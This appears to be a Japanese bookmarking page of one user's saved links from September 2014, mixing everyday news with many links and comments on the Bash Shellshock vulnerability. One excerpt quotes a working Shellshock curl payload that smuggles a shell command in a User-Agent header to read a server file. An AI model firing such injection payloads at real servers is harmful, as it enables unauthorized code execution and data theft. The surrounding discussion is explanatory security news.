タグ

2014年9月25日のブックマーク (13件)

  • ScalaMatsuri 行動規範を掲げた経緯 - OE_uia Tech Blog

    今年から、行動規範をScalaMatsuriとして掲げ始めた。 その目的は「みんな仲良く」。噛み砕いて言えば、性別、国籍などに起因するような少数派が居心地の悪い思い、不快な思いをしないことを目指している。 この行動規範について、突然Webサイトに追加されたので驚かれた方も多いかもしれない。この行動規範は、現実に発生しそうになった問題から、必要要件を考え、準備委員内で長期間に渡り議論を重ねた上で公開したものだ。 既にその目的については@eed3si9n_jaさんがカンファレンスでのユニバーサル・アクセスへ向けてという記事でまとめてくださっているが、来年から格的に運用するにあたり、この行動規範を掲げた経緯も含めて紹介することが、ご理解とご協力をいただく上では重要ではないかと考えているため、この記事を書くに至った。 この記事では、行動規範が生まれた経緯を3つの側面から説明していきたい。 行動規

    stealthinu
    stealthinu 2014/09/25
    勉強会等でネットのネタが発表に使われることがあるが、その際にもどうしても参加者が皆男という前提でネタが使われる場合がある。が、これは良くないよね。注意したい。
  • スターバックス、無料Wi-FiをSNSアカウントのみで利用可能に 9月26日から

    スターバックスとワイヤ・アンド・ワイヤレスは9月25日、全国のスタバ店舗で提供している無料Wi-Fiサービス「at_STARBUCS_Wi2」をSNSアカウント認証のみで利用する方式を開始すると発表しました。開始時期は、2014年9月26日。従来は事前登録が必須でした。 この認証方式による利用時間は1時間。対応するSNSアカウントは、Facebook、TwitterGoogleYahoo! JAPANの4種類です。 2020年東京オリンピック開催に向けて訪日外国人の増加が予想される中、スターバックスは事前登録を不要とし利便性を向上させることで、競争力を高める狙いがあるものとみられます。

    スターバックス、無料Wi-FiをSNSアカウントのみで利用可能に 9月26日から
    stealthinu
    stealthinu 2014/09/25
    おおっ、SNSのアカウントでWiFiのOpenID認証というアイデア、やはりもう出てたんだな…
  • 523592 – (CVE-2014-6271) <app-shells/bash-{3.1_p18-r1,3.2_p52-r1,4.0_p39-r1,4.1_p12-r1,4.2_p48-r1}: Environment handling command injection (CVE-2014-{6271,7169})

    stealthinu
    stealthinu 2014/09/25
    GentooのCVE-2014-7169に対してのパッチ。おおっと思って中身見たらこんだけ??という内容だった。1行足しただけ。これだけでよかったのね。
  • 二度と 泊りたくない宿でした。 : 十二屋旅館の口コミ - じゃらんnet

    宿・ホテル予約 > 群馬県 > 草津・尻焼・花敷 > 草津・尻焼・花敷 > 十二屋旅館の口コミ・評判 > 二度と 泊りたくない宿でした。 - 十二屋旅館

    二度と 泊りたくない宿でした。 : 十二屋旅館の口コミ - じゃらんnet
    stealthinu
    stealthinu 2014/09/25
    これ他のコメント見ると宿の対応もどうも炎上しやすいとこのようだが、でもまあ宿泊者のほうがナニなんだろうなあ。宿側は自衛できないからな。
  • 子どもの声 騒音規制見直しへ - NHK 首都圏 NEWS WEB

    子どもの声も騒音だとして保育園などに苦情が寄せられるケースが相次ぐ中、騒音を条例で規制している東京都は、子どもの声を抑制するのは発育上、望ましくないとして規制の対象から外すことも含め条例を見直す方向で検討することになりました。 東京都は、住民の生活環境を守るため、条例でさまざまな騒音を規制していますが、子どもの声も騒音だという苦情が相次ぎ、中には、条例を根拠に保育園や公園の設置者に騒音の差し止めを求めるケースもあるということです。 一方、条例を運用している市区町村に尋ねたところ平成20年度以降、およそ7割の42の自治体で子どもの声がうるさいなどと幼稚園や保育園に苦情が寄せられていましたが、多くの自治体が子どもの声については規制はなじまないとして基準を緩和するか、規制の対象外にすべきと回答したということです。 さらに、保育の専門家からは「声を抑制するのは子どものストレスになり、発育上、望まし

    子どもの声 騒音規制見直しへ - NHK 首都圏 NEWS WEB
    stealthinu
    stealthinu 2014/09/25
    せめてこのくらいは改善されて欲しい。じゃないと「少子化対策」など絵にかいた餅でしかない。/ブ米で否定的な意見の人が思いの外いて暗澹たる気持ちになりました。
  • KLM Lost & Found service

    KLM’s dedicated Lost & Found team at Amsterdam Airport Schiphol is on a mission to reunite lost items as soon as possible with their legitimate owner. From a teddy bear found by the cabin crew to a laptop left in the lounge. Locating the owners can sometimes be a challenge, so special forces have been hired… And remember: if it happens to you, the KLM Social Media team is always there for you on F

    KLM Lost & Found service
    stealthinu
    stealthinu 2014/09/25
    すげえ。このいぬすげえわ。このためだけにKLMに乗りたい気にさせられる。
  • bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた - piyolog

    bashに脆弱性が確認されたとして騒ぎになっています。ここではCVE-2014-6271に関する情報をまとめます。 #記載内容について、誤っている、追記した方がいい等情報がございましたら@piyokangoまでご連絡お願いします。 脆弱性情報 脆弱性の愛称 ShellShock Bashbug CVE番号 Bash周りで発行されているCVEは6つ。その内詳細が不明なのが2つ。(CVE-2014-6277,CVE-2014-6278) CVE 発見者 想定脅威 特記 CVE-2014-6271 Stephane Chazelas氏 任意のコード実行 ShellShockの発端となったバグ。 CVE-2014-7169 Tavis Ormandy氏 任意のコード実行 CVE-2014-6271修正漏れによる脆弱性 CVE-2014-7186 Redhat DoS メモリ破壊(Out-of-Bo

    bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた - piyolog
    stealthinu
    stealthinu 2014/09/25
    なぜぼくのツイートが… だいぶ周回遅れだったはずなのに。朝にTLが既に祭りになってて @ttkzw さんのツイート見てヤバさを理解して orz となった時のがこれ。/あ、嫌だったわけじゃないんですよ。念為。
  • oss-sec: Re: CVE-2014-6271: remote code execution through bash

    Re: CVE-2014-6271: remote code execution through bash From: cve-assign () mitre org Date: Wed, 24 Sep 2014 21:36:47 -0400 (EDT) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MITRE is currently using CVE-2014-7169 to track the report of the incomplete patch, i.e., incorrect function parsing that's present in builds that are up-to-date with the http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025

    oss-sec: Re: CVE-2014-6271: remote code execution through bash
    stealthinu
    stealthinu 2014/09/25
    「CVE-2014-7169」ぐぐってもこの情報しか出てこない。つまりまだ世の中に完全なパッチは存在してないってこと??
  • Blog: bashの脆弱性がヤバすぎる件 – x86-64.jp - くりす研

    Browse by time: December 2018 (1) December 2016 (1) December 2015 (1) January 2015 (1) September 2014 (2) July 2014 (2) April 2014 (1) February 2014 (1) January 2014 (3) December 2013 (2) September 2013 (3) June 2013 (1) May 2013 (1) April 2013 (1) March 2013 (2) February 2013 (5) やっと更新する気になった。 もくじ 0. 産業で説明 1. 理論編 2. 攻撃編 3. パッチ 4. 結論 0. 産業で説明 bashが アホで 地球がヤバイ 1. 理論編 bashの関数機能は、環境変数の中でも使える仕様になっています

    stealthinu
    stealthinu 2014/09/25
    bashの脆弱性の件、例えばgitoliteなどのようにssh接続受けるけどshellは使えないサービスの場合この穴使ってshell使えるようになってしまうという例。
  • BASHの脆弱性でCGIモードで動いてるPHPにアレさせてみました - dogmap.jp

    タイトルはパクリ 元記事: BASHの脆弱性でCGIスクリプトにアレさせてみました – ブログ – ワルブリックス株式会社 sakura のレンタルサーバが cgi モードで php 動かしてるよなーと思ってテストしてみたらできました。 # テストスクリプトは削除済みです。 test.php test.sh #!/usr/local/bin/bash echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script which is executed by /usr/local/bin/bash" 結果 : Apache CGI版 PHP $ curl -A '() { :;}; echo Content-type:text/plain;echo;/bin/cat test.php' http://wokam

    stealthinu
    stealthinu 2014/09/25
    やはりcgiモードで動かしてる場合はphpも影響受ける。なのでmod_cgi経由で使ってる環境の場合はダメと。
  • 行列してでも食べたい!小布施堂の秋限定・和栗点心「朱雀」を堪能

    旅は人生人生は旅。短い一生で足を踏み入れることのできる場所・その眼で見ることができる風景なんてほんの僅か。だから今、旅したい。 2014年9月24日 ふと思い立って信州・小布施に向かった。 深夜高速バスで新宿から長野駅へ。長野電鉄に乗って小布施駅に降り立ったのが朝7時前。ちょっと早すぎるかなと思ったものの、小布施堂・店前に到着してびっくり。 なんと既に行列! 今しかべられない和栗点心「朱雀」の整理券(お事券)を求める人達だ。 ●小布施堂で究極のモンブラン「朱雀」をいただく | The little star dweller 小布施堂といえば栗がまるごと入った栗鹿ノ子が有名。 併設されているレストランでもこの時期「栗」を中心に据えたお料理各種が提供されるのだが、一番人気は今年採れたばかりの和栗をたっぷり使った「朱雀」だ。 レストランのオープンは9時からだが、時間指定もついたお事券は

    stealthinu
    stealthinu 2014/09/25
    小布施堂でこんなのやってたのか。やっぱすげー混んでるのな。
  • BASHの脆弱性でCGIスクリプトにアレさせてみました

    環境変数に仕込まれたコードを実行してしまうBASHの脆弱性が CGIスクリプトに影響を与えるか試してみたら結果は悲惨な感じに Tweet 2014年9月25日 嶋田大貴 この記事は2014年のものです 朝から Bash specially-crafted environment variables code injection attack なるもので騒ぎになっていたので、さっそく手元の Apacheで試してみました。 /hoge.cgiというURIで実行されるように、一行のメッセージを出力するだけの CGIスクリプトを設置します。いっけん、なんの入力もクライアント側から受け付けていないため危険のありようもなく見えます。 #!/bin/sh echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script w

    BASHの脆弱性でCGIスクリプトにアレさせてみました
    stealthinu
    stealthinu 2014/09/25
    bash脆弱性の件、具体的に簡単に試せる方法について。curlで-Aオプションでuser-agent偽装で超お手軽…
  • Bash specially-crafted environment variables code injection attack

    This article was originally published on the Red Hat Customer Portal. The information may no longer be current. Update 2014-09-30 19:30 UTC Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278.  We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be ta

    Bash specially-crafted environment variables code injection attack
    stealthinu
    stealthinu 2014/09/25
    bashに環境変数設定で実行まで出来てしまう大穴が… すごい大昔からの穴。しかもいろんな環境でこれいろんな攻撃が可能になりそう。昔からあるperlのcgiとかmod_cgiで動いてるのとかに対して攻撃が可能か?